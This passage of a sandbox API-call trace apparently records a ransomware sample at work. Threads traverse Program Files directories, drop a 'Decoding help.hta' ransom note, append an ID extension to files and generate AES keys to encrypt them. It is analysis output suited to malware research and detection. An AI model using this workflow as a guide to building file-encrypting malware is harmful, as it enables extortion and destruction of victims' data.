Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" [0058.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.377] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.377] lstrlenW (lpString="gadget.xml") returned 10 [0058.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 70 [0058.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" [0058.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" [0058.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.378] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.378] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.378] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.378] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 70 [0058.378] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js" [0058.379] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" [0058.379] GlobalMemoryStatus (in: lpBuffer=0x1b25fd10 | out: lpBuffer=0x1b25fd10) [0058.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2463d2d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0058.379] CloseHandle (hObject=0x260) returned 1 [0058.379] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1b25fd30 | out: lpFindFileData=0x1b25fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0058.379] FindClose (in: hFindFile=0x671170 | out: hFindFile=0x671170) returned 1 Thread: id = 714 os_tid = 0xf70 [0054.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*", lpFindFileData=0x1b35fd30 | out: lpFindFileData=0x1b35fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14980 [0058.683] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.683] FindNextFileW (in: hFindFile=0x10f14980, lpFindFileData=0x1b35fd30 | out: lpFindFileData=0x1b35fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.684] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.684] FindNextFileW (in: hFindFile=0x10f14980, lpFindFileData=0x1b35fd30 | out: lpFindFileData=0x1b35fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ac4100, ftCreationTime.dwHighDateTime=0x1c9db19, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x66ac4100, ftLastWriteTime.dwHighDateTime=0x1c9db19, nFileSizeHigh=0x0, nFileSizeLow=0x4940, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.684] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*" [0058.684] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*") returned 70 [0058.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\Decoding help.hta" [0058.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\decoding help.hta")) returned 0xffffffff [0058.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd34 [0058.684] WriteFile (in: hFile=0xd34, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b35fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b35fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.685] CloseHandle (hObject=0xd34) returned 1 [0058.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.685] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.685] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*" [0058.686] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*.*") returned 70 [0058.686] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" [0058.686] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" [0058.686] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd34 [0058.686] CreateFileMappingA (hFile=0xd34, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd38 [0058.687] CryptAcquireContextA (in: phProv=0x1b35fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1b35fcec*=0x10e281b8) returned 1 [0060.239] CryptGenKey (in: hProv=0x10e281b8, Algid=0x6610, dwFlags=0x1, phKey=0x1b35fce8 | out: phKey=0x1b35fce8*=0x10f149c0) returned 1 [0060.239] CryptExportKey (in: hKey=0x10f149c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1b35fbe4, pdwDataLen=0x1b35fce4 | out: pbData=0x1b35fbe4*, pdwDataLen=0x1b35fce4*=0x2c) returned 1 [0060.239] MapViewOfFile (hFileMappingObject=0xd38, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4940) returned 0x8630000 Thread: id = 715 os_tid = 0xf74 [0054.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*", lpFindFileData=0x1b45fd30 | out: lpFindFileData=0x1b45fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671030 [0057.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.525] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0x1b45fd30 | out: lpFindFileData=0x1b45fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.525] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0057.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.526] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0x1b45fd30 | out: lpFindFileData=0x1b45fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3add8b00, ftCreationTime.dwHighDateTime=0x1c9db1a, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3add8b00, ftLastWriteTime.dwHighDateTime=0x1c9db1a, nFileSizeHigh=0x0, nFileSizeLow=0x4940, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0057.526] lstrcpyW (in: lpString1=0x2a8a87f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*" [0057.526] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*") returned 70 [0057.526] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\Decoding help.hta" [0057.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\decoding help.hta")) returned 0xffffffff [0057.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7a0 [0059.233] WriteFile (in: hFile=0x7a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b45fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b45fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.625] CloseHandle (hObject=0x7a0) returned 1 [0060.625] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.850] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0060.851] lstrlenW (lpString="hxdsui.dll") returned 10 [0060.851] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*" [0060.851] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*.*") returned 70 [0060.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" [0060.851] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" [0060.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0060.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa90 [0060.852] CreateFileMappingA (hFile=0xa90, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x238 [0060.852] CryptAcquireContextA (phProv=0x1b45fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 716 os_tid = 0xf78 [0054.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*", lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8610 [0056.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.265] FindNextFileW (in: hFindFile=0x5d8610, lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.265] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.265] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.265] FindNextFileW (in: hFindFile=0x5d8610, lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0056.265] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0056.265] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0056.265] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0056.608] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" [0056.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") returned 64 [0056.608] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033" [0056.608] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*.*" [0056.608] GlobalMemoryStatus (in: lpBuffer=0x1b55fd10 | out: lpBuffer=0x1b55fd10) [0056.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9659e88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ac [0056.619] CloseHandle (hObject=0x7ac) returned 1 [0056.619] FindNextFileW (in: hFindFile=0x5d8610, lpFindFileData=0x1b55fd30 | out: lpFindFileData=0x1b55fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc251dc00, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x5e4b68d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc251dc00, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0056.621] lstrcpyW (in: lpString1=0x2aab0f98, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" [0056.621] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") returned 64 [0056.621] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\Decoding help.hta" [0056.621] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\decoding help.hta")) returned 0xffffffff [0056.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa30 [0058.218] WriteFile (in: hFile=0xa30, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b55fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b55fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.219] CloseHandle (hObject=0xa30) returned 1 [0058.219] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.219] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VSTOInstaller.config") returned -1 [0058.219] lstrlenW (lpString="VSTOInstaller.config") returned 20 [0058.219] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") 